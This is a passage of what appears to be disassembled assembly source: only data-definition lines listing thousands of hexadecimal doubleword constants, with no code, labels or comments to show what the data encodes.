		dd 0A94540EFh, 583CA684h, 56A8DF73h, 0C0211AB2h, 811A114Ah
		dd 2780AB12h, 9A50B346h, 0CD67163Ah, 0E53904C5h, 37C10A2Fh
		dd 0B10C6ACh, 396ECCBDh, 0A1B35D6h, 45A8E04h, 0BCC11915h
		dd 3E578BF4h, 8DBE6958h, 0AA3E8285h, 99590B65h,	4CDA2715h
		dd 8583EA07h, 36C1DA79h, 1FFEBAA2h, 0EFD21810h,	2319F8Bh
		dd 0F052C2D5h, 0BC628D70h, 7EBB9163h, 0C66415BEh, 323E732Eh
		dd 0E07C372Bh, 291488B5h, 3BC1C2C4h, 0B1E9EC1Fh, 5C4A465Eh
		dd 63695996h, 8B981078h, 589081A1h, 0C73DC0FEh,	2256E001h
		dd 5C6FA2E5h, 0BA4ABBCFh, 1FE20BC9h, 5019C268h,	181825EEh
		dd 0BB9CD845h, 0E9DACFF1h, 0A8621DF4h, 5F1790F5h, 12A1622Dh
		dd 6B909E8Bh, 0E090B700h, 0B310C469h, 86DABF22h, 58BC697Dh
		dd 210F8AD6h, 0FC57495Fh, 0F439EADh, 0DA68A80Dh, 0C3583463h
		dd 0DF644895h, 26E2FE49h, 0D50D2519h, 0B10F4C91h, 0A2CC94EFh
		dd 0BF06C7ABh, 0A04E4AE8h, 95914A4Eh, 0C0E8036Eh, 8711DC64h
		dd 33CFB18Ch, 24210EB2h, 0FDA6A9EFh, 0E7620E7Fh, 2529A3A7h
		dd 0FBF55E90h, 0A4AEAA98h, 0BB26D7E3h, 410E6758h, 81016FBCh
		dd 0AA85B9E8h, 8781EE62h, 0C0F7DD7Eh, 0A41830B7h, 6A8599F8h
		dd 54C892A0h, 0E0F517Ch, 0B06E8669h, 0B7AC98A2h, 0F8C84EF9h
		dd 0BA651F42h, 4B215589h, 0B3D35951h, 0F5287406h, 6C7F7DE8h
		dd 59979E76h, 819519AEh, 203D399Ah, 6CD7BCAEh, 99ABA5A2h
		dd 27A31824h, 9C33DEB3h, 56B11C00h, 5A775A33h, 410A79E4h
		dd 8848FEB9h, 2672FE99h, 7AE34226h, 0D1E6F466h,	5647ECD9h
		dd 35D86BD6h, 66264F93h, 0E7D2AB45h, 0E5F9638Bh, 0A3682F3Dh
		dd 62E16419h, 38AA1A3Eh, 1CCBB3C6h, 0B8BE0B52h,	0E88E93CCh
		dd 0AF9CF5EFh, 7DB6DD5Dh, 8F122426h, 68D9CE91h,	687E3B30h
		dd 0AE6E189Fh, 0D981335Ah, 754F9346h, 0CF7DA697h, 0D1DBA262h
		dd 0F3E88FE9h, 0CA22AD68h, 0E3EB58A8h, 0C5FD58D8h, 2C0D56C8h
		dd 0FDAFA104h, 10C597C0h, 0CE444EC6h, 0DD6562B9h, 2F98F323h
		dd 0E7C725Ch, 0C556D62Bh, 26178F9Ch, 0A8057BC1h, 493F7D62h
		dd 0D6965D1h, 3A098C6Eh, 0AC8EF154h, 0BF9DA5F6h, 6ABEDD78h
		dd 0BA7E4404h, 0F67D6561h, 0BE4B3114h, 0C499FB31h, 0C639C3A4h
		dd 0CD770B36h, 0FC9A4048h, 7510C183h, 0E4C4BA9Dh, 852252ABh
		dd 5024D660h, 0B0543EB8h, 6BEE482Eh, 28A18EC6h,	0A8A2330Ah
		dd 0EB297E97h, 28A12F55h, 4FDDE020h, 0D5047D50h, 0FD11A989h
		dd 0FF155CAAh, 386F55CBh, 3F8A1DBBh, 0BB553B36h, 3033285Ah
		dd 0ED7D13D7h, 0B9646476h, 0D544D16Ah, 3E92908h, 0DEA955F3h
		dd 3571476Eh, 0FCD00A42h, 50BF3462h, 9847D714h,	6516D305h
		dd 0E5616EE5h, 0E3D1AA23h, 0DD0A1DEBh, 6180ECCh, 9463DBB0h
		dd 0CD764421h, 34C5C99h, 71734957h, 53CC8336h, 6D0078C6h
		dd 0BA8BC00Ch, 0CC3350h, 4328DA0h, 0DE80E21Bh, 57959755h
		dd 2189F789h, 0C5409922h, 0BA429ACh, 24ACA792h,	28AC30ACh
		dd 36EB20ACh, 7AC910ACh, 0B803A1h, 0F9856CE6h, 0F2F3C9F9h
		dd 12D3C3F0h, 48E2AB8h,	80F41975h, 1D8B2B91h, 0CD7C23Fh
		dd 0F5F76DDEh, 2485314Ah, 926758B1h, 2E8A212Ah,	0B3EB4EA0h
		dd 0F436184Eh, 11CEE3AEh, 0ADD27A29h, 98BC6638h, 0DEBC1A04h
		dd 0EF5E259Eh, 12B2C55Ch, 8C5CB994h, 44CCCC11h,	808215D3h
		dd 0C2A5B004h, 14D46B32h, 2C28C163h, 0B3DA5DB5h, 0AEE9E8E8h
		dd 2D2BD9E4h, 70CA282Bh, 0D0E1249Dh, 0F23CEE4Ch, 6FD1F8E7h
		dd 30300AD1h, 594C02B6h, 439822h, 7AF0E3E5h, 0D0B66A83h
		dd 0C55D34A2h, 0B31736AAh, 0AA4F8563h, 30AE87E1h, 954C5FAh
		dd 3C02B43Fh, 4C820551h, 0CDAD0B32h, 81BD9AC0h,	0E4E64958h
		dd 9F3371A9h, 0B9C2FE55h, 0BCA6919h, 883B99FCh,	0BF7DB878h
		dd 805E9888h, 4C24E321h, 49895F7Ch, 96146D5Dh, 0C1E2FB12h
		dd 403378B6h, 4DEB4449h, 0E9AC484Eh, 4FB1837Fh,	0B4F51D17h
		dd 68A3D8C0h, 7DF251A1h, 608803C9h, 1AAC7AF7h, 0E149CC00h
		dd 132AB716h, 95FE63D4h, 758C0636h, 86EFC4D3h, 42416577h
		dd 0FC8F07B5h, 0A8447D95h, 0E12DF37Dh, 0CE84109Dh, 0F0741CE0h
		dd 16412255h, 6521DCC0h, 4F15EB20h, 18630200h, 0F9968D03h
		dd 908B10D9h, 9B924C67h, 0A9DAB6E1h, 0D58250C2h, 0EBF89B1Eh
		dd 4A38E1FDh, 0E93ECD97h, 0EA9FB1FFh, 5E37A28h,	0E883E152h
		dd 5F8B658Bh, 683446A1h, 5846B9DAh, 962FAEA4h, 0FC052B13h
		dd 5BE4BB1h, 0C70BF7EFh, 1CB140FFh, 0C7B2D3D9h,	6A822090h
		dd 59B532D4h, 1A1D27D7h, 0C2EF429Ah, 3D74748h, 0D99F1D0Fh
		dd 658FBE1Fh, 6B3224C4h
		dd 0EF86EA41h, 31E80B1Bh, 35083699h, 5FE1607Fh,	0E78FA058h
		dd 0DCD42C7Fh, 7833D705h, 61484104h, 5B6386E1h,	6CF8CE69h
		dd 567F4660h, 9B41B187h, 0E0274C94h, 1F47A1A7h,	0F5DEC53h
		dd 0CAEEF9E8h, 2EA3768Eh, 81A15AEBh, 0E8BE8A2Fh, 0FD883963h
		dd 146C0BEh, 60081850h,	691082EAh, 8E4F2308h, 553D9599h
		dd 873646C8h, 8623CD63h, 2DD1EB7h, 0EBB619FAh, 756FF581h
		dd 31BCF717h, 36FBA8D6h, 6416D41h, 0F4650D10h, 0A4400A1Bh
		dd 58256B01h, 53882297h, 0B949989h, 0D700481h, 2078486Ch
		dd 50A76FA5h, 0BCBB3E35h, 8AEC820Eh, 0AE290C43h, 17D81922h
		dd 676B071Bh, 42E5B360h, 0F3C60D16h, 0B12143Bh,	26E8DF77h
		dd 95744317h, 0C3F6E315h, 5348E82Ch, 766DF538h,	0EA7B0739h
		dd 0D0B84D82h, 1B693761h, 0C8F9B84Fh, 0EEE333E0h, 0A7E4E4FAh
		dd 0B3C88308h, 31521231h, 7010505Eh, 200560FFh,	637F46FDh
		dd 44679F04h, 0B0DCDDFBh, 0D139580h, 1C46FEEFh,	0EEEAAE42h
		dd 0E4DD49EAh, 7FB9CD85h, 0AF4B63F4h, 9953FE62h, 0B872F455h
		dd 0C49044h, 211E17E2h,	0DEBB26CDh, 0EFA38092h,	13141324h
		dd 345E753Eh, 82163842h, 8595734Bh, 27518916h, 288D873Ah
		dd 0CC64130h, 0D8E3BD0Ch, 0EB136EBh, 0A14AD175h, 1F27B101h
		dd 0C498A9B8h, 8A330BD2h, 7898CE5Fh, 202B8443h,	60703E1Ch
		dd 3A88141Bh, 9C1D28EAh, 0CB490190h, 62EA9710h,	6C72AFE5h
		dd 0ED29DFCCh, 944C153Bh, 0A9D9A99Dh, 0F7F14223h, 0CFFC189Ah
		dd 0FA42543Ah, 15619D4h, 0E02EB6DDh, 20DD47CCh,	1F281468h
		dd 6074E2D9h, 1A72C49Dh, 3B03A6EAh, 70184BFEh, 0BFFBC781h
		dd 8D03E5B0h, 0C175F4EDh, 285DB8FFh, 0E8D92D65h, 7D304E98h
		dd 9FBF4A70h, 0FC403EAFh, 77D5F685h, 6037F3B8h,	0CA601F62h
		dd 0C804CA79h, 0FF28C175h, 5398058Bh, 0ED0F0B4Bh, 0FBF6166Bh
		dd 3E3017CFh, 0D9D158A2h, 8DE93FF7h, 3B82DC2Eh,	29D1C1EAh
		dd 0C7869155h, 0D6A3B688h, 0E1BF3E5Fh, 7A71400Bh, 3CAA1014h
		dd 27EE34E9h, 9B07BA24h, 0B318AD80h, 0B2EE7ECh,	0CC440308h
		dd 884C61D2h, 0D4051778h, 3300AB65h, 59987F18h,	8F970317h
		dd 0FA174875h, 0ED019531h, 2E46396h, 0BC12446Dh, 0CC7F42D7h
		dd 628F0CBCh, 1A1C8642h, 0E100EB87h, 5050C345h,	0DFCC29DAh
		dd 0DD7BACCh, 0D638500Dh, 540138E3h, 0E3317DA6h, 0FF00C1C5h
		dd 48B2B42h, 0D71A41CAh, 82F5EF3Bh, 1C5C2EAFh, 0A016567h
		dd 0EAC60952h, 81CC81A0h, 0B48760CFh, 9FD7754Ch, 3CC6E16Dh
		dd 0B750E91Eh, 0F2B8C01Fh, 3CBEF0AAh, 0A2E53E8Eh, 6A8F91EAh
		dd 0DB861761h, 74B84CFEh, 1E8A9753h, 0B903137h,	5703D61Ch
		dd 0D1E8F025h, 898B9B92h, 2174BBDCh, 0E243BEE1h, 8F0A5C60h
		dd 0A17BC032h, 0A55E138Ch, 42F9BC08h, 919A0CA8h, 0B5F08DA4h
		dd 0E944CA17h, 55D2047Bh, 0A34BA528h, 0A6CFC7A5h, 0DFA5FC97h
		dd 5D01FFCFh, 55574041h, 0BA3E1861h, 0F4723B36h, 0C6BBE7E6h
		dd 0F7E0AD57h, 62D52E85h, 94BDF643h, 8F90BF83h,	17F63224h
		dd 92D2ADFCh, 0A2F46A53h, 21D18DC6h, 974D3980h,	5D544BA4h
		dd 75D22EA2h, 0D94BBAC9h, 43B7EC25h, 5216B5FBh,	9B943F52h
		dd 0B8D46CD2h, 0B570BA41h, 62403814h, 2774F300h, 0AC2D261Dh
		dd 0A78962C1h, 8492E7Ch, 19DB52B6h, 2A94ACD2h, 0FD10B7A6h
		dd 8310D0ADh, 4903D824h, 81C91301h, 522B8080h, 66F08210h
		dd 0D8550B4Dh, 370C36DEh, 0EFE0F89Ah, 130C9CA4h, 410CCE18h
		dd 0FEEEF310h, 403BBA43h, 741F8C75h, 0A2C507B4h, 89E0328Ah
		dd 0A3C08D74h, 818C7FC0h, 390056F0h, 0D039DDAh,	3D96C50Dh
		dd 9639300h, 0D5165A38h, 87994612h, 848555CDh, 0A82F7015h
		dd 68DC4621h, 0AF41AE55h, 118A3058h, 639594EFh,	0DA79919Fh
		dd 6B8A8BECh, 0C873310Ah, 0E00E00D2h, 75AF8CCFh, 0C6E11ECFh
		dd 3DBB814Dh, 1FC40FC3h, 18EFC39Ch, 96464023h, 666E37FDh
		dd 0EFBF8DA0h, 0E9B3543Bh, 75BC6F07h, 0D45275F3h, 698C4D57h
		dd 2422EBE6h, 9887F13Eh, 0CA1FDA81h, 50FDE135h,	314CE9B9h
		dd 5D6B825Bh, 82E92980h, 0FAA698CBh, 0E9D9FA29h, 0DC0D2F96h
		dd 2F21C1Fh, 1940FFB6h,	2B27A1E3h, 19C3719h, 278B2A1Eh
		dd 0C441E5CAh, 50F3F8A1h, 0A99C4670h, 26DE38C2h, 7034C58Fh
		dd 5B9FF2D2h, 0E34E03D0h, 0AC4FBE50h, 9B85548Fh, 9543FC0Dh
		dd 85D9538Fh, 0AD8D991Ch, 0D5E89933h, 0C0E08245h, 0FE0250C1h
		dd 529407Dh, 5DF04FD4h,	0EA2EA87h, 0E82902B5h, 505D2089h
		dd 958E3D3h, 8E8178ADh,	8ED0B6ACh, 0B17FD375h, 39A63EE0h
		dd 929EFFD8h, 0E75CE273h, 4B1A4270h, 50494648h,	0B923C15Fh
		dd 702589A9h, 1DDD10A6h, 9924284Ah, 7AD87244h, 98D7504Dh
		dd 348CE2E9h, 0C69350EBh, 878A889Bh, 347C4E02h,	0F49A554Fh
		dd 73611B81h, 636A3B01h, 49CA7EACh, 4A709156h, 42C9AEA0h
		dd 0C6E7C28h, 0B4268868h, 0E1ABA5D8h, 0BEBFCA1Eh, 0B2E4FFF0h
		dd 2691AD83h, 0DD4319BDh, 226479DFh, 6316D0F9h,	9BBA1301h
		dd 41D02A98h, 0AC4B87BAh, 0AF5FD425h, 724760A0h, 4038F714h
		dd 508828BAh, 0F110E020h, 662CFADFh, 4E5C550Fh,	278689F8h
		dd 8D949206h, 6DFFB30Eh, 9B3AD287h, 80A385FEh, 0AD050DFBh
		dd 6E03A46Fh, 80A850E0h, 1C2DA8D5h, 552FA1EDh, 5F435260h
		dd 628CB48Ch, 3790EFDAh, 0D99751B5h, 0E1373E17h, 4C287143h
		dd 4A1D0DBCh, 518596D3h, 51ED7BCh, 6234B3CCh, 9FC2A144h
		dd 5D43DE09h, 0FA8EEBCFh, 46064250h, 8A50A216h,	48A705CEh
		dd 0BA5FFA3Fh, 0E89FC918h, 99A06462h, 21A4A4E0h, 27C9287Dh
		dd 98814FB2h, 0AA9B9CE1h, 800743DAh, 0C4C440AFh, 0E08106D7h
		dd 0A8F39D0Bh, 7050799h, 558FD5EBh, 0DD95B339h,	43E1F16Ch
		dd 0F19E8041h, 3E7C3C0Dh, 0FD748C2Ch, 581A4AD7h, 14CCEEACh
		dd 713F59A2h, 0C0903A99h, 294EDDB4h, 0F696FC15h, 3D0E8ABAh
		dd 734E5786h, 9FCD89AEh, 0E38374Ch, 0F1A8A655h,	6535F282h
		dd 222F69F5h, 0AFAAF4FFh, 0DEA46181h, 0D38C9AEAh, 4E245A10h
		dd 69A44FDh, 358E11BDh,	0A4424A3Ah, 0D12C6C91h,	1931C8C5h
		dd 13D8B1F4h, 0A1402281h, 5F2B6999h, 74DEE9D4h,	18DA3A1h
		dd 2069BB81h, 0A3D55D6Dh, 11A55F8Fh, 0EAAA2536h, 7362A669h
		dd 606CEE1Ah, 0D20EED2Ah, 0E0946F14h, 0DE4BB62Eh, 0BC4C5A77h
		dd 6118B489h, 84B43085h, 0ADBB8A1Bh, 43588D28h,	22A6A012h
		dd 958C9C7Fh, 8BF48ACCh, 15254F1Fh, 0D47BF1A5h,	0ED23C895h
		dd 593BB70Bh, 0C1A58A66h, 816955B2h, 2CD24E4h, 62CE6A7Bh
		dd 0DD67DA2h, 8D287DFBh, 44AE9033h, 0B14229A8h,	4A40A3DEh
		dd 3A1D6941h, 58D491B2h, 0FD3155EFh, 3496349Fh,	86CD4694h
		dd 4AC08CACh, 349A469Ah, 15942CFBh, 9479A51Dh, 7792D1EBh
		dd 0E2D7A329h, 6346EBC0h, 0D725CD1Ah, 0A2A414DBh, 7E5369B2h
		dd 0D365506h, 2069C403h, 0A1E01F90h, 3EB3B2BEh,	53C72EE3h
		dd 5C2068Ch, 0A314AAD3h, 0F9B4BB6Fh, 55D222C6h,	0DFF20A88h
		dd 228C650Fh, 2FF26027h, 4D726205h, 0BCE37424h,	7015D940h
		dd 8F2050A0h, 302A2505h, 957E5149h, 8AD68342h, 8BF41F6Ah
		dd 1D0E5690h, 7E210C52h, 3DD343D0h, 7AEE5455h, 0AB78DDFEh
		dd 2BEF1AE6h, 0A33B624h, 0E0FA905Eh, 0EB460C1Ah, 10C217Fh
		dd 0F4FABDD8h, 0F706C0E3h, 16C0CF00h, 0B0B496EAh, 0A9971C7Dh
		dd 81F308D9h, 317EDFBDh, 294F2B92h, 20689404h, 148F192Ah
		dd 7EF8DB4Dh, 58BD1B0h
		dd 85A75A5Eh, 9F60CBD1h, 5FDF49BBh, 8185DBF0h, 6B5031AAh
		dd 4513E063h, 0FC7465Fh, 7C665369h, 23D96D5Ah, 121D406Fh
		dd 2836271h, 198DD620h,	85F2ECD0h, 0D1EE8611h, 0D0B48203h
		dd 4D633B56h, 96250CC7h, 0BF9D6690h, 38868891h,	0F35C1417h
		dd 2DF7BDF1h, 204D81A5h, 2528C6CFh, 533E020Fh, 33C8E9CCh
		dd 443991AEh, 703E89F8h, 94104253h, 63621743h, 0DF59A0E4h
		dd 0A5E9309h, 122041D0h, 62CD85CCh, 0A4FD74DEh,	0C29B2E0Ah
		dd 681C5EF1h, 43FBC659h, 330662A1h, 0A0C46038h,	3AD89401h
		dd 0BE517BEEh, 0BC9C59F5h, 0AD6EC4F5h, 0B6986A2Fh, 40CAC0A5h
		dd 0B7D815C5h, 7034F26h, 0C04E7325h, 49CD744h, 0C296E72Dh
		dd 72E7681Ch, 51B0658Dh, 8250F201h, 3FD0D019h, 6300DB08h
		dd 0FDF3957h, 1582D089h, 240672F1h, 5463FC6Ah, 0BC0F08B7h
		dd 0D60A1630h, 9B9F8985h, 39B1D9Dh, 0DDF8D804h,	50119ABAh
		dd 0EE51CE3Fh, 34A1385Fh, 4A82BF14h, 0EB948672h, 0A67C1015h
		dd 0E206723h, 40010FB7h, 0EB39C6D1h, 20288558h,	8121040h
		dd 80A8879h, 0EEAA2441h, 0DC802483h, 2C5F7123h,	0AB4105B0h
		dd 0ADBE2F74h, 78D2172Ah, 686655A0h, 0E715AA13h, 0E55D2D3Bh
		dd 0D5598595h, 0AAC86270h, 0AAB158Ah, 68357462h, 0C5D220B0h
		dd 0A1730F06h, 42F81816h, 115E7583h, 3E5DEB8h, 133110AFh
		dd 311D7AE8h, 3CAA040Fh, 50B7090h, 0BB18D684h, 0E181D785h
		dd 0C309F0A8h, 4091E410h, 90168014h, 55A42108h,	37EC0EA5h
		dd 5A717011h, 0ADF34430h, 0C489F17Ch, 0F3D8146Ch, 691D1F9Dh
		dd 265099B9h, 82F44B0h,	3AF1324h, 2DD29F39h, 55EAC8FAh
		dd 1588C4Ch, 9C12D85Ah,	3545C442h, 0B1E8487Ch, 9B287EE1h
		dd 8431500Ah, 54CD056Eh, 62045562h, 0D73F65Fh, 6A88AE2Eh
		dd 38CE240Dh, 948C5699h, 40085421h, 48113294h, 0A824A048h
		dd 658A202Ch, 0EDDD1B02h, 7EAB6487h, 1F7AA153h,	328F2D77h
		dd 5975C53Ah, 61579205h, 85F5489Ah, 0A2BDE28Eh,	0C5017D70h
		dd 6B2762A1h, 0D4380B9Eh, 0F016C318h, 0CCCA4680h, 616CC396h
		dd 35241D10h, 0E24B6866h, 0D0915C41h, 0FF218769h, 0D975F098h
		dd 55C87C19h, 0B028C48Eh, 50AA751Dh, 2844959Eh,	0C0101ED0h
		dd 0B243B36h, 0C6316325h, 62EB553Dh, 0E44901D0h, 11D522E8h
		dd 8BE5262Ah, 0FE4013E9h, 17E7A20Ch, 0CF2392C6h, 0FBB20971h
		dd 0ECA88EACh, 3841BB99h, 0F9556F90h, 5C783C5Fh, 3FB66150h
		dd 796262B3h, 59B51381h, 0A6B9B2AFh, 2582245Ah,	48F2D080h
		dd 28822216h, 0DD062409h, 9A6A2405h, 0F237D4C0h, 2311FEC5h
		dd 2902AD01h, 804374A9h, 95930663h, 8B044049h, 250E9B75h
		dd 2E70AB9Fh, 0ED9F0216h, 0B3F6CA26h, 0B1BEA491h, 817F7A25h
		dd 0AA3BF65Fh, 0F7F47DE5h, 1001818Ah, 1C17629Ah, 58BE76D2h
		dd 95306C67h, 0A45FBC8Dh, 36B397DFh, 0D78BAD0Bh, 0CE998441h
		dd 0B54144B5h, 5805794Dh, 5565977Ah, 9424334Ch,	918C8CC4h
		dd 2F955597h, 0E3B2CCADh, 67F1D585h, 0D228F8CCh, 0FBC5A450h
		dd 0E333CBF8h, 0F2B0CD85h, 489306A3h, 0F32C319Ah, 6A41A308h
		dd 1B6888C6h, 60679887h, 8E783ACCh, 0A4E37EAEh,	51B82C7Ch
		dd 51C229C6h, 9F454D20h, 0EE75BD09h, 8B6CA3C3h,	8EF9798h
		dd 44385292h, 23DBC47Ah, 54D6AEBh, 9D1E2E57h, 0FFD0FAD2h
		dd 0E4E2038Eh, 0EE1031ABh, 84436604h, 67B1400Ch, 2B0F0D4h
		dd 0C1C4A9A6h, 2F177CA7h, 77F85D09h, 8A46F44Ah,	155CDE9Fh
		dd 9A9CE17Dh, 3BCEF04Fh, 7D87D5C9h, 0A863C4DFh,	4BC57EEBh
		dd 0A3205FBh, 0A577F009h, 0ECA3D34Bh, 0F1B3E06Fh, 0EFFC6475h
		dd 403C8F4h, 0E4FD2BB5h, 5EC54145h, 6AE9AC18h, 0E2E9DA20h
		dd 1C91AC4Ch, 0EEDD1A56h, 661852C1h, 84E80D79h,	3383842Eh
		dd 0FA632182h, 15CDF955h, 0AC366391h, 678B20ECh, 6196A3B9h
		dd 405614A5h, 84C4BFFh,	36192228h, 0FC520F96h, 91B53F66h
		dd 0A0C432A7h, 2448A362h, 42FBF607h, 0A4EF3F0Eh, 585ED892h
		dd 963603F9h, 9DFC3BC8h, 5B06911h, 260854FEh, 634AEEF6h
		dd 9EA42314h, 0D2FC2636h, 0CD007773h, 430FA28Bh, 0BB5CC459h
		dd 81FD1FFAh, 0F91FE2AAh, 0EDEB0FC3h, 3E9D9A2Bh, 88629331h
		dd 92B311D4h, 0C2594705h, 0A42FF46Fh, 0C45B8FC0h, 42119E5Bh
		dd 979D02B3h, 0B29EB66Eh, 0AFADE49Ch, 511C5D3Ah, 3160CAD8h
		dd 68C1BACCh, 37CE10C4h, 655801E9h, 0CB446494h,	0F783C6CBh
		dd 1BAEE693h, 985E518Fh, 2808A525h, 839C5B31h, 8551974Eh
		dd 0C52339E8h, 0C976FED7h, 4FD26F0Bh, 8AEE0ABEh, 2BC9A9DCh
		dd 835170AEh, 8133F16Ah, 3A51CB95h, 39F6327Ah, 5510FC1Dh
		dd 32E054C5h, 4EA65209h, 3A487AEEh, 1EE5155Ch, 999D29F6h
		dd 0C0F55524h, 0C682F188h, 0CB19F7ABh, 4FB602Ah, 102B87B2h
		dd 0AA20C520h, 0A5585CF5h, 0B44BF1Ah, 6BDC163Ch, 2FBD9627h
		dd 0C84863E2h, 7AEBEC00h, 31854F12h, 257EAD40h,	0A02E04A0h
		dd 7F85DEAAh, 0CB0AD5B1h, 5118771Dh, 509B61F3h,	0C58DB845h
		dd 24D2595Dh, 2E87AB90h, 0A935B007h, 0F249235Ah, 4AF99C6Eh
		dd 6F323863h, 0E54FE955h, 18146015h, 10CF6C32h,	5DCE84ADh
		dd 2327D05h, 894C4424h,	4E5B84A5h, 8B6E15D6h, 0A5220022h
		dd 10CDD11Bh, 54A9720Bh, 6697F398h, 0CE566C1Ch,	0D218C6B9h
		dd 604D9BCh, 25140C31h,	0A67ADC88h, 2A554F17h, 0B36330A2h
		dd 49503D72h, 0BE2DB950h, 145EE125h, 0DC0A1DD2h, 282EEB3Ch
		dd 0B8C0D7AEh, 3D64EC1Ah, 0DA216F46h, 0B13D821h, 5CEBE8h
		dd 4413AE70h, 8755B00Eh, 6AEE218Ch, 0F64344B1h,	40212B70h
		dd 4D72F0B1h, 57510F0Ch, 0F3024920h, 4C58CE3Fh,	0B2BC7B46h
		dd 19044E6Dh, 8BE122AFh, 4B316A87h, 82C1DACDh, 8595B800h
		dd 0A17ACE08h, 3688D7AEh, 0C5ED5CE2h, 46ED82BBh, 66582C5Fh
		dd 688C6650h, 38C52A1h,	0E3013285h, 0BE93C15Dh,	0C824E9C2h
		dd 0C4B666D4h, 8AEEA316h, 0AFB76273h, 789A7B05h, 0C732C57h
		dd 60964C5Eh, 9C6780D6h, 2C402999h, 0F02741Dh, 519F1A51h
		dd 41169D69h, 37688ED6h, 0BFE38A96h, 0FF273EF8h, 537B3C07h
		dd 0E0F9500Fh, 0A04153h, 1E2498FFh, 9FA9258h, 0EA604181h
		dd 3D94B38h, 4094116h, 92FE91E0h, 0F823A09h, 93BE5F44h
		dd 9D0FC9D7h, 1B7F3327h, 4DA530F2h, 6595F66Ch, 46444192h
		dd 89AB5BE0h, 0C1293DA3h, 7A4B320Dh, 55F22057h,	3AC54644h
		dd 0E33768C8h, 0FF21D900h, 7F5FC021h, 2E700FC7h, 0A57CC0CDh
		dd 518EC575h, 14F6841h,	6E2BA397h, 38C7E902h, 52ECADB3h
		dd 310552B3h, 898C76Fh,	1E1862F1h, 3C8C9C63h, 0C7166134h
		dd 6691C74Ch, 0E3669904h, 0CF9EF383h, 5C67E036h, 3F868083h
		dd 0ADC3CDE0h, 296233DFh, 4D3545B8h, 0C8A9F18Ch, 0E553AF92h
		dd 0A184B167h, 0F57428Ah, 0B520F519h, 8A9C667Ah, 0AAC84BE4h
		dd 5260AF55h, 1942EE99h, 2F8B27A0h, 1A24069Ch, 606F483h
		dd 74219D06h, 0BC183EBh, 0F4B4482Dh, 4A425347h,	6F290E92h
		dd 0C57646F9h, 2FF128B0h, 0C6FEFECCh, 5725CAF6h, 39CA0BBCh
		dd 0BE3F5611h, 0E5EF025Bh, 0AC432706h, 23FB010Bh, 3E141395h
		dd 51AA044Eh, 22152394h, 0D993B634h, 0C2CCF62Ah, 0D40CA67Eh
		dd 3301683Dh, 0C625A8FAh, 0A80FD3E8h, 0BB0667F6h, 14E992AAh
		dd 0D570D02Bh, 1365BB77h, 45264118h, 68AC5CBBh,	21397817h
		dd 0A2FB1EB4h, 59829B32h, 78DA26E5h, 4599EE10h,	6ADA3D0Ch
		dd 686A1024h, 34D2523Bh
		dd 193E8A4Dh, 0FB6A0A9Ah, 0E1E28A4Ch, 490EBB57h, 0C514403Ah
		dd 9DC1380Ch, 9802B965h, 55494194h, 0DE460CB1h,	0EC073D18h
		dd 44212493h, 0B46E353Bh, 0A5B19479h, 0D949AB03h, 6C16331Dh
		dd 1E7249CCh, 26298231h, 7AB9D80Eh, 20481443h, 802D61B0h
		dd 7A6412D5h, 21B699A3h, 3349B80Bh, 56A224E9h, 566E1829h
		dd 7869A4E0h, 86523B4Bh, 2FF04117h, 611B4096h, 5CD2A71Ah
		dd 0A19D2D46h, 0FEA97895h, 5A263463h, 0C4BEABE9h, 71812338h
		dd 956D5D4Ch, 0A9DA127Ah, 5A3DAE8Eh, 0D72BA10Ch, 0AD26284Bh
		dd 56846092h, 6AC9E2F8h, 79CCAE73h, 0B236234Ah,	2355AFC8h
		dd 0C9E4B15Eh, 0CDD696DBh, 1DEC1555h, 7B8299F3h, 0FA6EC257h
		dd 0E4A3A08Ah, 0DA889D91h, 0E22BD4C4h, 0A958AEE1h, 9B38E9B9h
		dd 0E3264719h, 4CB5CC67h, 0D9809941h, 0AA6419ACh, 0DF07520Dh
		dd 61B388C6h, 762E9192h, 0DA39B191h, 4B2CA258h,	51854604h
		dd 0E088CCDAh, 8B1C8BFAh, 4599ED18h, 0E658024h,	46BE3896h
		dd 0D7D87D27h, 0F1F63364h, 8BDA3DA2h, 0CA4641Eh, 0A568A14Ch
		dd 0DFF5C132h, 59F2C624h, 0B38A5017h, 0C82BB86h, 0F18CE8F0h
		dd 15F4E8D9h, 116862F3h, 5F4FBEF0h, 44088AFAh, 0E0353FF2h
		dd 7790537Eh, 2D792BBCh, 62F8FDFBh, 1A0659A8h, 225C52Dh
		dd 8C0C1C4Ah, 0A354193Eh, 74A18FF9h, 0A689B504h, 3FF08C75h
		dd 21463364h, 96ADB359h, 0F483E15h, 89850886h, 88E256C0h
		dd 8A35FB1Eh, 37FAF9F6h, 62B51023h, 0B180C171h,	0D7B63064h
		dd 0B6CAEE6Fh, 3B05747h, 0FABEF01Ch, 517FA58Ch,	70659C26h
		dd 0C03F8AFAh, 202F5973h, 852E0B43h, 0F457ADFEh, 6A8AA073h
		dd 0BD0B736Ah, 2800BB99h, 0B1E79DD2h, 39DFE077h, 5D62BFC9h
		dd 280BE158h, 5D3485Dh,	0A041F817h, 51168F12h, 16CA2770h
		dd 0A082BA47h, 1133E883h, 0AAFD3E1Dh, 55FE3512h, 57BB2345h
		dd 193D4405h, 3398B00Dh, 0BBB2B93Ch, 6384B555h,	0C89BE704h
		dd 5DECCA3Fh, 0D6F317Bh, 3C54FB08h, 0C13E8732h,	0D535AABBh
		dd 7C623165h, 0AEF07D83h, 15DED238h, 0DB12446h,	0D84308DFh
		dd 0BBC07394h, 0E4C81752h, 0BACBA2DCh, 38D5C0D5h, 9F4A6332h
		dd 254545E3h, 320CB313h, 268D6B97h, 4C1F4E36h, 6B6A04BAh
		dd 19B61713h, 0AF519C29h, 19502E0Ch, 2E955327h,	224EDCB1h
		dd 0A3D81554h, 6E5F3157h, 55C3C8CFh, 84AAA81h, 0CAAAE0BEh
		dd 8580B9D9h, 13860AB2h, 223CD9D6h, 0F0063AB0h,	78439E0Eh
		dd 0B7782BB6h, 98DAF0B0h, 4A05B0A1h, 0B1084462h, 4EE02AC6h
		dd 0E631BCC1h, 372DF91Fh, 1667057Eh, 0F42BC5C8h, 3407C8Bh
		dd 0A541017Dh, 98FAB8E8h, 613703C0h, 0E3153025h, 33A0E96Eh
		dd 0B4217DCh, 82AFB2FFh, 1C83BF2Ch, 0D7CA30AEh,	0C1FB5677h
		dd 7154D29Ch, 0CFFFF9E9h, 0C331DFF4h, 306839BEh, 0A92B10D9h
		dd 16D080C4h, 0C368F46Bh, 5902198Ah, 0CCC29E0h,	8CAAE0E2h
		dd 24150136h, 61962FE6h, 98392F9Eh, 0C417540h, 66B48824h
		dd 0B159D108h, 99FDBF4Dh, 6FA571CAh, 2E90A759h,	0FFC5C58h
